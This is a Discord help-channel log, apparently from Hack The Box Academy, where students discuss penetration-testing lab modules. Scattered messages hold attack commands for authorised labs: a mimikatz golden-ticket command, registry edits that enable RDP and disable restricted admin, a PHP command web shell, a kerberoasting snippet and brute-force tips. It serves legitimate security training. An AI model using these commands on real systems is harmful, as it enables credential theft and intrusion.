#modules
I am looking for new friends to help me learn in the htb community!
if you wanna be my friend or have any questions send me a DM
@rustic sage @rustic sage read #welcome and #rules after that use /verify at #bot-commands like the others said, and take this to #general this is not the right place for that
Done and sorry 
Sorry I will do it
if still stuck, feel free to DM
mimikatz x64 keeps spitting ERROR kuhl_m_sekurlsa_acquireLSA ; Key import at me and ive already changed releases twice. not sure what im doing wrong, can anyone help?
i was able to create my golden ticket via:
./mimikatz.exe privilege::debug "kerberos::golden /User:Administrator /domain:inlanefreight.local /sid:S-1-5-21-3842939050-<REDACTED-<REDACTED> /krbtgt:<REDACTED> /groups:500,501,513,512,520,518,519 /ticket:inlanefreight.local.kirbi" exit
but the error happens when I:
./mimikatz.exe "kerberos::ptt inlanefreight.local.kirbi" exit
Documentation & Reporting Module
@proud pine My direct question: Why doesnt this work?

Protip don't ping someone that wasn't even involved in the conversation, that's the easiest way for someone to not answer your question
@fathom pendant protip fight your own battles
👍
honestly he couldve answered it. it seems most of you dont want to see other succeed. It's really sad to see it happening actually. its not just me. ive seen hundreds of people get discouraged by you and a few others here. It's not funny and honestly if you're not here to teach people something then why are you here? just to troll? get a life.
It's about common netiquette
ah the "unspoken rules"
And I have helped people in the past
you help who you want and you know it. im aware its not your job, but neither is being a mod here. i see 0 mod badge...
People get discouraged by their lack of determination to work for the answer
most times all they need is a push in the right direction. a link to a source that doesnt directly give them the "answer" is always available
ive seen you brush people off before you've even understood their question
We tend to link to sources that worked for us
ive then helped those people
If it doesn't work for them, then I guess it's a slightly different issue
they seem to understand when you dont explain to them like they're stupid
calling people stupid actively in chat is NOT common netiquette
ive SEEN you do it
Congrats on helping people though
bye. have a good night
And those people are generally ones that have a specific history of certain questions
again, half the time, you dont understand their question
i think maybe you need to look inward friend
this right here is my point exactly
that person was DONE with the lesson
their question was unrelated
YOU didnt understand
honestly i need not continue
Or ORRR they seemed to still be stuck on that issue
hahahahah nope
¯_(ツ)_/¯
you just refuse to listen. ¯_(ツ)_/¯
Btw the mimikatz error might be a version issue
I've also seen other mentions of people having little to no issues with the x32 version
You assume I wasn't still gonna look into the issue you posted about
Because we're having this little difference of opinion
And you seem quite bothered by it
I make generalized assumptions based on a displayed pattern of behavior. Because I mostly can't be asked to have all fixes that have been posted already in this channel
difference of opinion? no i just think youre not a good teacher/person in general. I'm attempting to disengage now, simply because i don't want your help. You just assume that.
Difference of opinion
:) have a good night
Like I said, I found a potential fix for your Kuhl error in mimikatz.
If it works, nice, if not well shit
I stopped helping here because of dealing with toxic people too much. I directed you here so you could get the help you needed from the people who do assist here. Your response to Marcie is exactly why I don't help here.
Also feel free to call me an idiot when I stumble through something here, I welcome it
toxic? i asked a simple question and this got blown into "dont @ people who have nothing to do with it" AS IF IT WASNT YOU WHO TOLD ME TO POST HERE
I didn't tell you I'd help you. I told you where to post your question.
its part of the cpts path
If rat was interested in helping you he'd tell you to dm
i dont know him
Okay? And the people who help with modules are active here, not in the CPTS channel.
i dont DM randoms
Marcie and rat are both some of the most prolific helpers here
but doesnt mean youre entitled to their help
PayloadBunny has the patience of a saint
Truly
right not at all, the message was to anyone who wanted to help answer the question. not berate me for asking in the wrong chat or @ ing someone
yall need to hop off the high horses
What high horse
I was specifically replying to your @ to only apply to specifically doing that thing, not your question
You need to stop crying about getting corrected
How did I berate you? I told you where to post your question, and to be more specific. The most common people who help are in this channel.
im not talking about you im talking about marcie
oh no someone told me which channel to ask my question in to get an answer boo hoo
bruh thats not even the issue
Like I'm sitting here, unbothered by your criticism
again. people here dont want to see others succeed, they'd rather just waste their time
I help people who ask good questions or provide enough context to assist them
Marcie has indirectly helped like a quarter of people pass the exam by helping them with modules lmao
And sometimes it's easier to tell someone "hey it's specifically this section/subsection"
I was in the first 20 to pass, and Marcie helped ME when I was going through the course lol
Because the course content is better than my dumbass
Before I passed marcie and rat were some of the biggest people that cheered me on and believed in me. So not wanting to see people succeed is wrong
I guide others to a treasure I cannot possess
Honestly though just focusing on my uni stuff for right now
Should have done this shit Monday
And been Ballin the rest of this week
I've also indirectly helped on modules that I have fully admitted that I haven't done or looked at
Just by being like "are you sure it's not c, b, a instead of a, b, c"
¯_(ツ)_/¯
Though I will say with my full chest, they need to include a better command in the imap section of common services
People hit the Nil wall when they use the fetch command given in that module
I think it was one of my first Erratum posts
I may be missing a piece of information or a lack of understanding about how nmap works, but I am getting an error I do not understand. I keep getting the “failed to resolve” error when I attempt to scan a target
It means that it was unable to connect, what is your command
Nmap -sV -sC -p- 94.237.48.48:46167
Ah
I see your issue
Ports are defined in Nmap with -p
But also, Nmap won't get you too far with that question
You'll need to enumerate in a different way
Hmm ok thank you
Help with task 10
title Appointment
If user input is not handled carefully, it could be interpreted as a comment. Use a comment to login as admin without knowing the password. What is the first word on the webpage returned?
Isn't that a #starting-point box?
yes
Then ask there
This channel is for Academy modules
Also @ornate olive that's a public_ip:port if that will help you move forward. Also it helps to say what Module and Section you're working on
Ahh I see, still learning the basics so it seems that was a fundamental issue in what I thought I knew about ips which is good to know moving forward 😆 . I’m working on Getting Started, Public Exploits.
Ah that's what I assumed
If you do Nmap you do ip -p port it'll probably give you a nudge, but generally speaking (unless told otherwise) public_ip:port it's gonna be a webpage
Http
Yeah knowing the difference between private and public ips helps
But you're not gonna run into public IPs too often
so from running a scan to see what services were running on the ip i got this
PORT STATE SERVICE VERSION
46167/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Getting Started – Just another WordPress site
|_http-generator: WordPress 5.6.1
what information from this do i need to use to find an exploit, i feel like im missing a connection in my brain here
What service is running, maybe you can navigate it via a browser
Http
yeah its running http so how do i use that information?
i get that part, ive had it open the whole time
Yes but think, functionally, how do you get there
a url
Mhm
And a url is simply a redirect to a public ip that's registered on public domain servers
In this case, the ip isn't registered so, how do you think you'd get there - knowing it uses http on a non-standard port
Http by default uses port 80
I'd suggest doing the information security Fundamentals path after this module
i definitely think there are gaps in my knowledge
Did you figure it out?
im confused as to what you are asking
here
So it uses http and you know the ip and port the http service is hosted on
enter the ip:port into the address bar?
Yep, you may have to change browser settings, some browsers try and force https, which isn't running
But that's if putting it in the address bar doesn't work
i did that like 20 minutes ago i just didnt know thats what you were asking 
I'm taking the approach that you don't know what you're doing
That webpage contains all the answers to move forward and follow the section with msfconsole
golden ticket achieved.
I did not have the problem with the ping, but my answer was not accepted
Were you able to solve it?
Hey everyone. I'm on the ACL Abuse tactics subsection of the Active Directory Enumeration and attacks module.
When setting a fake spn for the adunn user I keep getting a "constraint violation".
Been a few days and I can't figure this out. Anyone seen this before?
Constraints violation just means your request has a grammatical error or isn't following proper ldap schema
Source: I asked google
So are you sure you're formatting the command correctly
this is for htb academy not labs 😂
They were already redirected
I need help
so I am doing linux fundamentals
And?
and whenever I do uname -a
its asking me for what machine
what I paste
I dont know what to paste in
There's probably a target machine for you to ssh into, first off, second do man uname and it will tell you what info is where
Or even which flag that will only give you what's asked for
man <command> brings up the 'man'ual page for a command that provides tons of info
Find out the machine hardware name and submit it as the answer.
I know
I know what the name gives
I just dont know what it is asking me
like I know it is Linux
distribution Ubuntu
it's probably asking for uname -n ?
It's actually asking uname -i
yep
I already know the linux distribution
I am just doing it to raise my rank
-n is network nodename aka what it looks like in the network
?
Academy content progress isn't reflected on main htb site
its just that "hardware name" made things unclear... if its not a, or b, then it might be d, or c
bruh why does ls not work on here
That part is actually explained in the blurb under uname in that section
I am in ssh
try l
ls -la
this is the question
Read the commands at the top of the page
If you do just cd or cd ~ you're dropped into the user's home
its cd ..
I did that got into the users home
now it asking me " What is the path to the htb-student's mail?"
I believe you can use env for that
I will see
Hi, anybody who can help me in the Windows Privilege Escalation Skills Assessment - Part II privesc? I tried to exploit the kernel vulnerability but when I tried to start the service it threw an error. NVM, it worked changing the payload
Been having a problem with all modules that require me to use RDP, the FreeRDP window opens, but it's just a black screen
"Loading Dynamic Virtual Channel rdpgfx"
hit enter
hahaha
But why? never had this happen before
I dont know why but sometimes a blank screen appears but the desktop environment is there
if you hit some key it loads properly
Well thanks for the help! Lol
No problem 🙂
Screensaver claims another hacker
I have just finished the module
Can i DM?
sure
:))) this was the funniest solution I found in the modules channel so far! :))
You'd be surprised how often it comes up
no doubt, I was searching google for it myself before coming here to look it up, it took like 5 mins of my time today :D. I imagine myself on an actual project asking my manager I have creds but the RDP client gets stuck :))
Iirc I think it's actually that domain disclaimer that for whatever reason isn't showing
hahahah
I didnt think that it could be the screensaver
but when it happened to me I was really confused
Hi everyone
What is the best way to do CBBH and CPTS? Annual subscription or 2-3 months of premium subscription and unlock the materials with cubes.
2 months Plat should be enough give or take
Does it have labs with the material or how it's structured ?
All modules have a skill assessment at the end, and most sections in modules have labs that reinforce what was just taught
Same thing happened to me a few times today...
I assume lab access is unlocked with materials, but 3 months plat + exam voucher is equal to annual subscription. After 1 year you lose access to materials?
everything you unlock with cubes you keep for life
With annual, any module you complete you retain access to
All modules except tier 0 refund 1/5 their cost, and cbbh/cpts share some modules
Tier 0 is 10 back
the police cant help with that
Roblox support will help
My brother in christ that was a week ago
I know it was a week ago ?
Then the point is moot about correcting him now lol
Also there was a suggestion to contact roblox support after it was clarified
Ok
Reading is hard for hackers, it's a real problem 
Wdym
Is that aimed at me also I'm not even a hacker not that im wanting to learn it
Literally not even a handful of messages down from the one you replied to was the suggestion (by the same person) to contact roblox support
You don't want to learn? Yet you're in a server all about it? Or am I misreading what you're saying
I was going to learn it but I'm not wasting my time learning when I could do other things
Where is the gen chat
You need to link your main htb account to discord to access it
#welcome <- instructions conveniently here
I don't have htb
I'm wanting a loud ecoboost
And I don't care lol
This channel is for discussion and assistance with the htb academy modules
K
I told you that back then 🤷🏻♂️
Is that the same person?
Just completed the module NTLM RELAY ATTACKS and it's awesome!
All the contents were well crafted and explained. The final assessment will really test how well you absorbed the contents. It's great!
Congratulations guys for your dedication!
Different username that was trying to 'correct' you
Nice
Congrats 🎉
0.00% gang
Can someone help me with the module using crackmapexec? I'm stuck in the Skill Assessment section on the first question, I found the username list with --rid-brute from dc01 but I can't find any common password. Should I use some wordlists?
Both options seems good.. Annual or plat for cube unlocks
Ask the support team (green bubble)
Footprinting - Hard as part of CPTS Training
Questions:
||Completed this module, but I have some doubts after looking at some responses here.
-
How would I know if my private ID_RSA key can be used for the root user? I would have thought that the key belongs to Tom only, and hence I would have thought I could only SSH with the private key with Tom only. Turns out it works for the 'root' user too?
-
I had a lot of problems with regards to the last part. I know there is a MySQL service, but I couldn't Nmap any open MySQL ports. I even tried to start the service within SSH, but obviously that won't work. Why does running mysql in SSH work though? Can anyone give me an ELI5? Not sure why that is possible.||
Thank you!
hello guys
<div class="field">
<label for="passwordInput" class="label">Senha</label>
<div class="control has-icons-left">
<input type="password" name="password" id="passwordInput" class="input" required placeholder="********">
<span class="icon is-small is-left">
<i class="fa fa-lock"></i>
</span>
</div>
</div>
<div class="field">
<label for="rememberBox" class="checkbox">
<input type="checkbox" name="remember" id="rememberBox"> Lembrar
</label>
</div>
<div class="field has-text-centered">
<div class="columns">
<div class="column is-half">
<button class="button is-info is-fullwidth" id="loginButton">Entrar</button>
</div>
<div class="column is-half">
<button class="button is-fullwidth" disabled>Cadastro</button>
</div>
</div>
</div>
</form>
how can a change the <button class="button is-fullwidth" disabled>Cadastro</button> to allow create a new user?
Anyone else here a beginner?
I’m a beginner and want to get started into hacking any tips
do the intro to infosec academy path then go starting point then do boxes
and try not to overcomplicate it for yourself the more you just do stuff and try not to worry about how good or bad you are and what you should do next the better
For part 1. That's considered a spoiler but basically, just try.
Part 2) the service is running internally, meaning it doesn't have access to the outside, it's like trying to look at a hidden room in a house - the only way to know it's there is by being in it
Stuck at AD Enumeration & Attacks - Skills Assessment Part I
Question:
Kerberoast an account with the SPN MSSQLSvc/SQL01.inlanefreight.local:1433 and submit the account name as your answer
I really can't find a clue to proceed further. Only accessed the webshell.
I don't know from where to get the username and password to rdp to the machine..!
Can anyone help to get started with????
You didnt tell me anything back "then"
I just started footprinting too but didn´t read spoiler since its been like only 15 min and didnt come across any box xD
In the "file upload course", in the "blacklist filters" module. I manage to successfully upload a file with a php extension, but i get this error:
Is this a part of the challenge in the module? Also I have tried every extension from this list: https://raw.githubusercontent.com/fuzzdb-project/fuzzdb/master/attack/file-upload/alt-extensions-php.txt
Hello everyone! I am working on the AD enum and attack and I'm at the skills assessment 2. I'm running into issues finding the Admin hash. I've come across two from running mimikatz, dumping the sam and lsass but haven't found anything that'll get me onto MS01 as admin. Also if anyone would want to chat about how they identified the SeImpersonate issue I'd love to hear it, I found it by just trying everything.
The bruteforce module is kinda slow...
[STATUS] 76.16 tries/min, 2361 tries in 00:31h, 604791 to do in 132:21h, 4 active
Any way to speed this up?
I think you can go up to 64. Try -t 64
I dont think the problem is in the extension list, I think you should find a way to encode your php
i think <? is in the blacklist filter
you can find seimpersonate by just running whoami /all
Thanks I'll try that in the skill assesment 🙂
Regarding the use of an ID_RSA private key for the root user, it’s possible that the private key you have is indeed authorized for the root user as well, SSH keys are configured in the ~/.ssh/authorized_keys file of the user that you’re logging into. If Tom’s private key is listed in the root user’s authorized_keys file, then it will allow access. This can happen if Tom has been given root privileges, It’s all a part of trial and error, you’ll never know if you don’t try it..
It’s possible for MySQL to run and only listen on the localhost interface (127.0.0.1), which means you wouldn’t detect it with an Nmap scan from a remote machine. when you’re already connected to the machine via SSH, running the mysql command would work because it attempts to connect to MySQL over the localhost interface, which is where the service is listening
What service are you trying to brute force?
ssh
Hey y'all.
Is anyone else having trouble connecting to boxes they spawn up via ssh? It just consistently times out for me
Try ftp instead 😉
will do 😄
Not with -t 64 threads either, I’d try with something like 48
ok, i'm just running Nmap real quick to see if a FTP port is open.
Haven’t done that part yet but does sekurlsa::logonPasswords /full in Mimikatz help?
Thanks for the reply! I just tried it and it didn't output the domain admin, just the mssqlsvc clear text. I'm running mimikatz on SQL01 under SYSTEM, and I think I'm doing something wrong because it seems like that is working for most and I'm stumped.
The only way I've been able to see the domain admin account is by pulling the sam, system, and security hive and running pypykatz, but that's just the mscached version and won't work.
Ope... I see that now. I appreciate that!
Hey @hardy meadow
Can you help me with AD Enumeration and Attacks Skills Part 1?
Sure thing, what do you need help with?
Hi everyone! Can someone who has worked on "Analyzing Evil With Sysmon & Event Logs" module help me? So, on Detection Example 1, I'm having difficulties trying to hijack Windows Calculator using reflective DLL. I placed both files to a writable directory (under Desktop), but I did not get the "hellow from DllMain!" message. Instead, the Calculator started running. Am I supposed to use a tool to gain access to any of the file's config script to execute it?
Hey, What is this server for?
Greetings good people of HTB, I got a small question.
I am on module Shells and Payloads -> Laudanum section
I answered the first question.
Where is the Laudanum aspx web shell located on Pwnbox? Submit the full path. (Format: /path/to/laudanum/aspx)
Kinda stuck at this one. The operating system is windows, I am using kali to do the whole task.
I don't understand the question. Is there a specific aspx web shell that I have to search on my kali to be able to answer the question, or do I have to dig deeper into the stuff?
Lol, I'm on the sql injection and accidentally found a flag meant for later in the course
ez
Basically we discuss anything related to Hack The Box.
Be it, modules, certificates, or generally anything in the vast field of cyber security.
Everything here's ethical and done via lab environment.
Nvm, did it.
Currently I cannot proceed further to RDP to the machine? Having no idea how to proceed
Can you help me in this?
Stuck at AD Enumeration & Attacks - Skills Assessment Part I
Question:
Kerberoast an account with the SPN MSSQLSvc/SQL01.inlanefreight.local:1433 and submit the account name as your answer
I really can't find a clue to proceed further. Only accessed the webshell.
I don't know from where to get the username and password to rdp to the machine..!
Can anyone help to get started with????
One sec and I'll check my notes
Sure
You were able to get the flag for the Admin right? Did you already set up a reverse shell to your attack host?
Yes found the flag present in the desktop of the administration
For reverse shell NO
I thought I have to do something with the given web shell 😅
Should I use revshell for this or something else?
Went through forums, many recommended lot of ways, all messed up 
you should list what access you currently have
Only the webshell
😣
and what is the user for that webshell?
WEB-WIN01
Hello, I am following the XSS module
And I am in Phishing section
And when I put sudo php -S … in bash it doesn’t work
nope, the user you have running the webshell, not the hostname
When I login I don’t receive the password in bash
And when I want to see creds.txt they told me that it doesn’t exist
Help me pls
nt authority\system
yep, that's as good as a domain account, so kerberoast away
Should I start with this shell or setup a separate reverse shell and then go further?
Also this webshell has a lot of restrictions
you have system, you can do whatever you want on that
ok let me try
Thanks for the help
anyone might have an idea why RDP is not working in Pwn3d Enum & Attack AD Lab II?
on the contrary, enable it beforehand
I ran these two commands beforehand:
Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -name "fDenyTSConnections" -value 0
reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f
in a pivot machine
Hi, PW attacks module
Hi all,
Has anyone completed the last task of the "INTRODUCTION TO WEB APPLICATIONS" module - Next Step? Where you have to create your own simple web app (static web page + API + back end) and then test it for vulnerabilities and fix it!
I created a web app, but when trying to test/hack it, nothing (the methods posted during the module) works.
Could someone tell me why? Or tell me what testing methods are applicable for my web app?
Here is the link for my web app - https://github.com/Utmins/WebApp_PHP.git
Hello, I'm doing the dns lab for the common web services
I wasn't unable to find the dns flag through DNS requests
I found another way but I want to check
What exactly didn't work?
Just finished AD enumeration and attacks and I loved it, I did actually learn a lot from this one, so much juice in here that I think that I'll stick to the subject for a while.
@acoustic owl I used dig to get the flag but I don't get any answer for the flag record (I don't want to spoil here)
It didn't work either with the automated tools
🧃
You need to provide some information so that I can help you.
Was there an error message?
Which domain did you query?
Thanks! Yeah I didn't know why it was saying grammatical error when I was following the module commands step by step. After digging through the channel history it seems like I might need a backslash for the spn name instead. I'll do it later today and tell you what happens.
Establish a web shell with the target using the concepts covered in this section. Submit the name of the user on the target that the commands are being issued as. In order to get the correct answer you must navigate to the web shell you upload using the vHost name. (Format: **, 1 space)
Shells/Payloads module.
Guys I am damn slow.
(Format: **, 1 space)
I found the answer
||iis apppool\defaultapppool||
But I have no idea how to fix it..
What is the answer supposed to be?
Try just the left half
Will do , 1 sec.
Nope.
I thought of removing the same letters, so it comes down to ||is\apol||
This Hack The Box Academy module is focused on pinpointing attacks on Windows and Active Directory. Utilizing Splunk as the cornerstone for investigation, this training will arm participants with the expertise to adeptly identify Windows-based threats leveraging Windows Event Logs and Zeek network logs. Furthermore, participants will benefit fro...
What section?
Antak Webshell.
That's stupid
Well, I am stupid.
And you did the webshell on the vhost yeah?
Just show a screenshot of the address bar here
Address bar?
Yeah, just waiting for my gyazo to load.
Don't need gyazo
@acoustic owl can i pm you?
That's weird having IP/domain but whatever it works
||result ||
I doubt it's credential related.
Unless it has SPECIFICALLY to be <htb-student> user and pass.
Did you add status.inlanefreight.local to your /etc/hosts
Uh..no?
Then it's likely you're not on the actual correct upload page
So it's causing issues
How do I add it to /etc/hosts
...
Please don't give me an aneurysm
it goes ip then hostname
if you see the pattern with 127.0.0.1 \t localhost can repeat it
ip is probably not 127.0.0.1
Oop, yeyeyeye
unless you are doing a port forward or something
which maybe you are I didnt look far enough up in the chat
Can I do 127.0.1.2
Nuh, shells and payloads.
ya
sure thing 
sure
Well, I changed it to the targetIP, uploaded the .aspx (antak webshell)
But it gave the same answer as before.
can you screenshot ._.
what the issue you are having is
So this is the result:
Establish a web shell with the target using the concepts covered in this section. Submit the name of the user on the target that the commands are being issued as. In order to get the correct answer you must navigate to the web shell you upload using the vHost name. "(Format: **, 1 space) "
Shells/Payloads module.
Guys I am damn slow.
(Format: , 1 space)
I found the answer
||iis apppool\defaultapppool ||
But I have no idea how to fix it..
What is the answer supposed to be?
That's the task.
I will delete it afterwards as it contains the answer.
what's there to fix? you got the answer, no?
It doesn't work.
And whenever I post the format here in dizzy, these little * fix themselves.
what doesn't work
yea? that's the answer
Well, when input it doesn't work.
did you format it according to the question?
I tried a lot of stuff. I just don't get how to format it.
ah I see now, once you added to /etc/hosts the url replaces the ip
and this question is in the antak webshell section?
I dont think apppool is the right answer to that ._.
or at least its not what I have
I hope.
i need 200 person
So I gotta dig deeper?
Are you still trying to do ip/status.inlanefreight.local?
Did it already.
It could be that they have a different account run different instances idk
I just have a different answer in my notes for that
Wait.
Instead of just status.inlanefreight.local
Yeah?
that etc hosts is right
are you sure you are looking at the right host
like that ip is what spawned when you started the assignment
I did use another credential htb-student and HTB_@cademy_stdnt! when setting up UPload.aspx.
Yep.
That vhost is given on the section
I extended the time.
Webshell doesn't care about who uploaded it
once you added the vhost, go to that vhost and upload the shell, it's simple as that
^
At least you learned what vhosts are now
I just don't get how there's difference between <ip> status--and just the status--
I know what I will be reading this night.
Want me to delete the wrong answer , that's a bit above in the convo?
Ip redirects to the default web location, however when you add it to /etc/hosts with the right subdomain/vhost it tells the web service to direct you to that set of files
I see now.
i'm on footprinting module, just finished the cloud section, and im really amazed by how a single mistake can lead to a company falldown
Well...yeah.
the amazon ssh keys leaks are crazy
That's generally how most companies get hit
The medium lab will be fun, I assure you,
dammn
One dumb user/one misconfig
The hard lab would seem easier than the medium.
Humans aren't bright
hehehee im really excited about this module , can't wait to start the labs !
That's why they r humans.
lol
If you need assistance DM me.
I got it all documented.
Won't spoonfeed.
But I would give you advice.
That's what I enjoyed most, the medium lab.
Like...of all HTB as of now.
alright man ! i will definitely hit you up if i need some assistance about the labs !
yeaaaaah man
HTB Academy is so well structured
It iss.
and i also love how they teach stuff with tons of examples
makes studying fun lmao
My parents r yelling at me for not sleeping while doing HTB X_X.
Then sleep, nerd
I would take that any day for 12 hours rather than regular university.
Nuh uh, I want CPTS.
And it'll still be waiting for you
i'm also a student and i only do HTB and some alternatives, the uni courses are shit
my spouse calling me freaking psycho with all the cyber staff
im on my first year uni , we aren't even studying shit about cybersecurity lol
Idk, now that I have shown people what I can do, people attempt to hire me for stupid stuff.
And I can't do a lot.
got any certs under your belt?
For some reason the rConfig has default admin:admin credentials.
Nope, CPTS will be the first,
It happens
i wish you the best friend ! i hope you get your sword soon !
Will do, kind people.
Thanks man!
agree
If you go into it exhausted to all hell or don't pace yourself you will fail
True.
Just being blunt
I got an exam tomorrow, I am actually going to sleep. Leaving the php web shells and live engagement for tomorrow.
Tired = mistakes, mistakes = frustration, frustration = stagnation, stagnation = failure
Someone pin that for the CPTS.
"Tired = mistakes, mistakes = frustration, frustration = stagnation, stagnation = failure "- Marcie 2023
Anyways, gn lads. It was fun talking.
I will be back soon.
I always step away when I start getting frustrated or start making too many mistakes
also, don't forget to stay hydrated lol
🌵
yeah even the pjpt is an easy exam, when i was stuck in it , taking some steps away and getting a good nap helped my brain to open up
UNDERSTANDING LOG SOURCES & INVESTIGATING WITH SPLUNK- Introduction To Splunk & SPL (first module), 3rd question:
Navigate to http://[Target IP]:8000, open the "Search & Reporting" application, and find through an SPL search against all 4624 events the account name that made the most login attempts within a span of 10 minutes. Enter it as your answer.
How is the answer the actual answer? I used bucket... looking at the hint, I have no clue how they expect us to use range(). What I'm saying is, my search yielded different accounts with a higher count within a 10m span than the answer account
Is this the right channel to ask? or should I go to cdsa?
Could I bother you for a hint about how you proceeded with question 8 on the second skills assessment? I've been stumped for a couple of days now. I can't seem to find the right admin hash. Thanks!
range() is max() - min()
This gives you a difference. You can then use this to filter the 10 minutes
Modules is the correct channel
in the module page, it only mentions earliest and latest
PM
how would range be used in splunk? are the parenthesis included?
PM Sent
am I being silly to think that there is an instance with 250 SYSTEM logons in a span of 10 minutes?
Thanks for the resource 🙂
I don't know how you searched for them, but I get a different result
👀
should I send screenshots on here or PM? idk what's the common courtesy
PM me
hey there, i'm just finished this module
Using Splunk Applications : Access the Sysmon App for Splunk and go to the "Reports" tab. Fix the search associated with the "Net - net view" report and provide the complete executed command as your answer. Answer format: net view /Domain:_.local.
What Sysmon App? I don't see it
Has anyone taken the Secure Coding 101: Javascript module? I'm interested in going deeper into JS security for my web security studies.
Anyone do the Skills Assessment (1 or 2) on Intro to Whitebox Pentesting? Stuck on both. On SA1, have authentication, but cannot for the life of me figure out how to get code execution... (seems simple enough, but again, just not getting it). On SA2, went thru the sanitization/validation, and now it says "code injection should not be possible, even without sanitization or validation".... but at a loss on to do (excl the sanitization/validation). Please feel free to DM. Thx.
EDIT: Still lost on part-1, but broke-down and used a code analyzer on part-2 and while not (yet) solved, identified a clear problem.
Try running a sub-domain fuzzing test on 'inlanefreight.com' to find a customer sub-domain portal. What is the full domain of it?
not work
Hi I just finished the Command Injection Skill Assessment Module. However I notice commands like base64 -d <<<sinebase64str and ${PATH:0:1} doesn't work on that server even on a php shell <?php system($_GET["cmd"]); ?> am I missing something. Is it related how the server is configured? is it possible to disable things like ${PATH:0:1} and <<< from a linux level?
I see. Guess I need to have the mindset of 'trial and error' haha
Gotcha! Didn't know that was possible, much thanks for the help!
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://FUZZ.inlanefreight.com/
Hey dude, saw you did Secure Coding 101: JS a while back, any feedback on the module? How heavy are the requirements, was it any good?
Considering I had effectively 0 JS experience but was able to fumble my way thru it... I think it provided everything needed to succeed. Gotta pay, really, Really, REALLY close attention to what you're doing -- very easy to mess up and be at a loss as to why. Very satisfying to complete. And with that, I'll re-review that module in looking for what I'm missing on the second part of the intro to whitebox SA, thx.
Cheers!
that's not how you ffuf a subdomain
that's definitely wrong homie.
according to the guide it is that way
defxsec@htb[/htb]$ ffuf -w /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u https://FUZZ.inlanefreight.com/
Cheat Sheet >> ffuf -w wordlist.txt:FUZZ -u https://FUZZ.hackthebox.eu/ Sub-domain Fuzzing
what finds me is the following
www support my blog
it says this on HTB's cheat sheet?
oh they changed the question from when I did it
this would work but the syntax is wrong, use the same case for FUZZ
yes
hi guys i did intro to threat hunting with elastic's skill assessment. I have a question regarding task 3 which requires to Create a KQL query to hunt for "PowerShell Remoting for Lateral Movement". Enter the content of the winlog.user.name field in the document that is related to PowerShell remoting-based lateral movement towards DC1.) I was able to find the answer using hints given. However I am curious how I can validate 100% the command I have found was targeting DC1 since when I filter for destination.address I get 0 results
Still stuck on ACTIVE DIRECTORY ENUMERATION & ATTACKS: AD Enumeration & Attacks - Skills Assessment Part I
I am trying to transfer mimikatz.exe from pwnbox to that webshell given as default in the section
After running the above command why is there no mimikatz.exe in the directory I am transferring?
Stuck for more than a day..!!! Seriously 
Please help
does the target even have scp installed? and doesn't antak have a file upload function? why take the extra steps
and are you still trying to kerberoast
I am not able to find the upload button
let me show you
Is there a glitch or something
After this when i check /uploads no mimikatz.exe
Can you mention this here?
I am not getting this exactly
Hey guys I didn't really know where to go for this question but I'm having this issue where my VM isn't naturally routing to HackTheBox using OpenVPN. Default route is still the public ip and I have to specify the interface the vpn uses in order to get commands like ping to work....
aah sorry
my bad
got this
sorry @next bronze for making a mess up
Hello, there. I have not seen that happen before. Are you using Windows as your host OS? Also, a foolish question, but are you using sudo when you run openvpn? I know that my personal firewall and VPN did cause a few issues.
Hello, folks. I hope that this is the right place to ask this. I have been working on the Intro to Assembly, and I have been stuck on Conditional Branching for hours. I am not even sure what it is asking. I have tried everything that I could think of and read on the page. I am just stuck, and I was hoping someone could please point me in the right direction so that I can get the correct HEX.
I'm using Kali Linux as the host. I am also using sudo when running openvpn. The site detects that I am connected and it is technically confirmed that I am connected when I execute a command like ping -c 5 -I tun1 [Ipaddress]. Pinging the target machine with the VPNs interface. That will work but it isn't viable once I get to commands like telnet as there is no way to specify the interface in that command, leading to a deadend with the lab...
change the assembly code so that rax is 10 when it reaches the instruction cmp rax, 10
cmp rax, 10
jnz loop
first line compares rax to 10, if rax is 10, the zero flag will be set, the second line will jump if the zero flag is not set
Anyone ever done this module to be able to say if I'm supposed to find the sysmon app or get it running myself?
Oh, I am not sure then. I am sorry. I assume you are running two different terminals or tabs? I wish I could help, but I have not seen that.
the interface will be selected automatically when you specify an IP for telnet, it will route to the VPN IP range, 10.x.x.x
Thank you. I did try that, but it still says that the answer is wrong.
did you put in the hex value?
Yes, the hex of the two numbers multiplied. I did not just want to say it. I did only put in the four characters
the answer should be the value of mov rax, 5 after modifying to break the loop, not the final value
I do not think that we have to get anything running in there. We just look for the items it wants us to look for. At least from what I recall, as I finished that up a few weeks ago.
that's fair, do you know where I would go to ask if everything is as it should be with the module? I don't see the sysmon app installed
Thanks for answering 🙂
Let me try. I did do the si, but I stopped at the cmp. I will look again.
it's 3 characters, not sure where you got 4 from
I went through the bad way, I realised now
What i was planning to do was this
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/SQL01.inlanefreight.local:1433"
Then crack the password with mimikatz. Got it, it's the wrong way
It's always gone by the default route which isn't the one used for the vpn. Every command I've ran thus far I had to specify the interface or else it didn't work.
┌──(kali㉿kali)-[~/Documents/HTB]
└─$ ip route show
default via 10.0.2.2 dev eth0 proto dhcp src 10.0.2.15 metric 100
10.0.2.0/24 dev eth0 proto kernel scope link src 10.0.2.15 metric 100
10.10.10.0/23 via 10.10.14.1 dev tun0
10.10.14.0/23 dev tun0 proto kernel scope link src 10.10.14.163
10.10.14.0/23 dev tun1 proto kernel scope link src 10.10.15.164
10.129.0.0/16 via 10.10.14.1 dev tun0
and then when I try changing the default to the vpns interface there is no internet.
$rax : 0x32
yeah I guess that would work, but you should just use one of the automated ways in the kerberoast section to do it
0x32 is 50 in decimal
who do I ping or which channel do I write to, to have a module section looked into to see if I'm going insane or if there's something wrong?
Yes, and I thought that was the answer.
that means you have multiple interfaces pointing to the same subnet
does 50x5=10?
No. So, that makes sense on why it is not the correct answer. I do have mov rax, 10, and I did not change anything else.
you're supposed to change the number of mov rax, 10 so that the loop breaks, the answer is the number you change it to
that's it
I don't remember how exactly vbox network interfaces are configured, but you might want to use a bridged adapter instead of a NAT
I know I had to go to actual support for one of the questions. I had something mistyped and over thought it.
